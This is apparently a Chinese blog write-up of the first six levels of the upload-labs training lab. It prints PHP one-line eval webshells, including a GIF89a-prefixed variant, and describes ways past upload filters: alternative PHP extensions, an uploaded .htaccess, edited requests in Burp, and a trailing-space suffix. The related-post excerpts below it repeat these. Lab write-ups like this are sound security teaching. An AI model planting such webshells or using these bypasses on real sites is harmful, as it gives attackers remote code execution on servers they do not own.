upload-labs前六题

最新推荐文章于 2023-02-26 21:05:37 发布
最新推荐文章于 2023-02-26 21:05:37 发布
阅读量324 收藏
点赞数
文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yxltx_/article/details/121258565
版权

解题之前我们先来了解一下一句话木马和webshell

一句话木马:

如:<?php @eval($_POST['a']);?>

其中 eval 就是执行命令的函数,$_POST['a'] 就是接收的数据。 eval函数把接收的数据当作PHP

代码来执行。这样我们就能够让插入了一句话木马的网站执行我们传递过去的任意PHP语句。

webshell:

PASS 1

任务:上传一个webs hell文件

 解答:

1. 新建一个记事本 写下一句话木马 修改后缀为.php

2.选择1.php文件进行上传 发现无法上传

3.查看源码,发现不允许上传.php文件

4. 修改后缀名为.jpg

上传成功!!!!

PASS 2 

任务 上传一个webs hell到服务器

解答:

 上传文件1.php 显示文件类型不正确 查看源码

 发现允许上传.jpg 和.png的格式

修改文件后缀名

 burp进行抓包

 修改后缀名为.php

 

蚁剑测试连接

pass 3

查看源码 发现不允许上传.asp .aspx .php .jsp后缀文件

这是后端检查
绕过方法有  畸形后缀名
php1、php2、php3、php4、php5、php7、pht、phtml、 phar、 phps、Asp、aspx、cer、cdx、  
asa、asax、jsp、jspa、jspx等

 

上述如果想要被当成php执行,需要有个前提条件,即Apache的httpd.conf有配置代码 AddType

 

application/x-httpd-php .pht .phtml .phps .php5 .pht .

方法:

在 /etc/apache2/ 目录下的 apache2.conf 中编辑,直接在最后添加 AddType application/x-httpd-

 

php .php4t .phtml .phps .php5 .pht 。

 百度抓包 修改后缀名为.php5

 蚁剑连接

 

pass 4

查看源码

 黑名单几乎拒绝了所有问题的后缀名,除了.htacess

.htacess文件是Apache服务器中的一个配置文件 她负责相关目录下的网页配置  通过htacess 文件 可以实现:网页301重定向 自定义404错误页面 改变文件扩展名 允许\阻止特定的用户或者目录的访问 禁止目录列表 配置默认文档等功能

写一个.htaccess文件

 上传.htaccess文件 1.jpg文件

 蚁剑测试连接

 

pass 5

 

第五关中的黑名单加入了.htaccess

尝试给脚本文件加上常见的文件头

常见文件头有:JPG:FF D8 FF E0 00 10 4A 46 49 46 

                         GIF:47 49 46 38 39 61

                         PNG:89 50 4E 47

上传成功 但无法解析 继续修改

修改一句话木马为

GIF89a
<script language="php">@eval($_POST['pass']);</script>
上传成功

蚁剑进行连接

 

 pass 6

查看源码 发现.ini也加入了黑名单 我们可以通过在后缀名后加空格进行绕过

抓包 修改文件类型 

 

 

yxltx_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
文件上传--webshell
qq_37051023的博客
11-12 1612
1、webshell---服务器端可执行的脚本文件(命令解释器),以web的方式执行shell(shell类似cmd.exe linux的bash等)------总结一句话,以web方式可以达到系统命令解释器的效果文件 webshell分为三类:小马、大马、一句话木马 ...
文件上传-图片webshell上传
qq_25899635的博客
05-21 4545
图片webshell制作 在服务器端的PHP代码中,对于用户上传的文件做文件类型检查,查看文件格式是否符合上传规范。可以检查文件二进制格式的几个字节,从而判断文件类型是否正确。 针对这种情况可以直接新建要给1.jpg,其中代码内容如下: GIF98A <?php phpinfo(); ?> 上传图片webshell文件 将制作好的图片webshell上传到服务器。 其中可能Cont...
PHP文件后缀-图片头格式2021-10-28
qq_53030229的博客
10-28 848
1、PHP图片后缀 ".php",".php5",".php4",".php3",".php2",“php1”,".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",“pHp1”,".Html",".Htm",".pHtml"" 2、图片头格式 添加链接描述
文件上传upload-lads
sheep_qm的博客
12-21 1431
文件上传upload-lads 第一关 端绕过(js) 本关是对文件名的过滤(在客户端进行) 即若文件名中存在php等后缀则直接过滤(弹窗) 上传一个webshell到服务器 但只容许上传".jpg|.png|.gif"; ".jpg|.png|.gif"; jpg。png。gif的文件都不可执行,所以需要上传.php的文件 创建1.jpg 写入一句话木马 GIF89a <?php @eval ($_POST[pass] ) ;?> 使用bp重放 修改文件名为1.php即可 或者 因为是进
CTFshow_文件上传
qq_45927819的博客
11-29 2966
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之的操作,但并没有上传成功:
安装upload-labs
最新发布
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
WEB渗透学习-upload-labs靶场
04-20
**WEB渗透学习-upload-labs靶场详解** 在网络安全领域,特别是Web渗透测试中,了解和掌握文件上传漏洞是至关重要的技能。"upload-labs"靶场是一个专为学习和实践文件上传漏洞设计的平台,它提供了21个关卡,从基础...
upload-labs-master.zip
06-22
【描述】描述中的 "文件上传漏洞小游戏靶场upload-labs-master/upload-labs-master/upload-labs-master/upload-labs-master" 显示这是一个针对文件上传漏洞的系列练习,通过多次嵌套的目录结构,可能旨在模拟不同...
upload-labs19-20以及总结1
08-08
在本关卡中,我们面对的是一个Web应用程序的文件上传功能。从题目描述和源码分析,我们可以看到存在几个关键的防御措施,但同时也存在明显的漏洞。首先,我们需要理解文件上传的基本流程及其潜在的安全风险。...
上传文件漏洞靶场upload-labs
09-27
【上传文件漏洞靶场upload-labs】是一个专为网络安全爱好者和初学者设计的实践平台,主要目的是帮助用户深入了解和练习上传文件漏洞。在Web应用程序中,上传功能常常因为设计不当而成为攻击者利用的安全隐患。这个...
文件上传漏洞靶场:upload-labs安装和第一关
selecthch的博客
12-10 1945
安装: 靶场安装:靶机系统文件下载:https://github.com/Tj1ngwe1/upload-labs 下载后解压到自己phpstudy的www目录下,在浏览器输入:http://localhost/upload-labs/ 或者:http://127.0.0.1/upload-labs/ 安装完成。 第一关: 目标上传一个webshell到服务器。 提示让上传一个...
burp suite 进行webshell上传
weixin_30455067的博客
10-20 417
主要功能: burp suite 可以将客户端与服务器之间传输的数据进行拦截,然后对数据进行修改并在此发送,从而完成攻击设置代理服务器 Proxy/Options/listeners中,可设置默认的监听IP地址的端口号 建议用Firefox 或ChromeIE内核不同的浏览器burp suite 也可以对不同虚拟机中的浏览器进行拦截 在Proxy/Op...
【威胁分析】<?php eval($_POST[‘a‘]);?>
sinat_35058227的博客
08-29 5161
请求体解码为: <?php eval($_POST['a']);?> 一句话木马。 eval():将括号内的字符串解析为php代码。 $_POST[‘a’]:a=XXX,向后台传输的参数 所有的字符串放入到eval当中,eval会把字符串解析为php代码来进行执行,那么结合$_POST[‘posha’]的话,只要使用post传输时在name为posha的值中写入任何字符串,都可以当做php代码来执行。 利用示例: URL: XXX.php?a=XXX 威胁分析: 1、判断是否利用该方式攻击:
web渗透_一句话木马(webshell)_dvwa环境
摸鱼域的空气。
04-04 8083
厄薇娅·瑞尔说,今天是个好日子。 一、什么是一句话木马 <?php @eval($_POST['a']); ?> 先来一段简单的一句话木马,解析下它的构造: @这个符号的作用是抵制错误提示;eval()函数将接收一个字符串参数,并将这个字符串作为命令语句执行;$_REQUEST['a']从请求参数中得到a这个参数的值,请求参数有两种:GET和POST;a参数名(自定义) 而这段代码的意思就是:用POST方法接收变量a,把变量a里面的字符串当做php代码来执行。 也就是说,你想执行什么代码,.
文件上传漏洞原理与实战——upload-labs靶场
weixin_52180702的博客
07-06 663
upload-labs靶场 文件上传漏洞原理与实战
upload-labs pass1-9
x_13579的博客
02-26 195
上传一个webshell到服务器上传区要我们选择上传的图片我们可以试着上传一个图片可见我们成功上传了再试着上传一句话木马被拦住了,该文件不允许上传,说是文件类型不被允许
上传图片 webshell php,webshell后门上传流程
weixin_42522626的博客
03-17 1618
1、将webshell.php的后缀名改成jpg等图片格式,即web.jpg。2、打开相应网址,注册好账号后选择上传头像将web.jpg上传期间运行fiddler并设置断点,切换到raw界面,等到其提示相应请求代码后,将其代码段中第二个含有上传图片名称的代码改成web.php,之后继续响应请求。3、此时已经成功把后门程序上传,将服务器反馈的代码中含有路径的部分复制粘贴到网站URL后面(注意将?ph...
网络安全笔记-WebShell与文件上传
L120305q的博客
08-17 2839
网络安全笔记-WebShell与文件上传
文件上传漏洞(一句话木马)-学习笔记
热门推荐
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
upload-labs第六关
08-17
upload-labs第六关是关于文件名后缀黑名单限制上传的一个挑战。根据引用中的提示,本关禁止上传后缀为".asp"、".aspx"、".php"和".jsp"的文件。在这一关中,你需要绕过这个限制,成功上传一个包含这些后缀的文件。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值